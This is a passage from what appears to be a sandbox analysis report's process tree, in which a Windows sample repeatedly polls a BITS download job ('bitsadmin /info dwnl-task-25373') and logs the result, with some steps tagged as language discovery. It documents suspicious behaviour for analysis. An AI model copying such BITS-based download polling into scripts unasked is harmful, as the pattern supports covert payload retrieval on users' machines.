      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2660
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3920
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2728
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3424
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2924
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2436
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2116
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3332
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3500
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1104
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3604
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2748
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3816
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2892
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3140
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3940
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:4020
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1720
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3264
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3028
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3468
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3096
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3352
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3164
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2916
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2260
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1580
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2728
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1960
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1520
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2924
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2828
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3480
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1964
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2024
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2260
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2748
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1748
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2448
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:904
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2344
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2704
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2660
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2716
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3912
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1960
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3312
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3424
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3028
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3188
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1268
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:4004
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3464
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2604
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1964
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:236
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3468
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2956
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3256
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1720
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3800
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1520
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2756
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2464
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2204
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:920
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1428
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2888
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2604
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3724
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1748
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2176
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3264
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:916
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3940
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2916
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1976
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3512
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3320
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3912
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3424
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2436
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:992
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3464
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3508
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2204
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1752
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2924
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2828
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2904
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3760
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2888
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1864
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2944
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3256
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2176
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2116
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2660
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2732
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3320
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3988
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2948
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3372
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3200
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1428
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:408
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2404
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3140
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:920
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1528
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2828
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1964
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3920
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3804
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3436
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3988
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3372
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:4084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3500
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2404
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1580
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2260
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1528
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2216
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3140
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2288
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2716
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2464
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3940
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2660
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2428
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
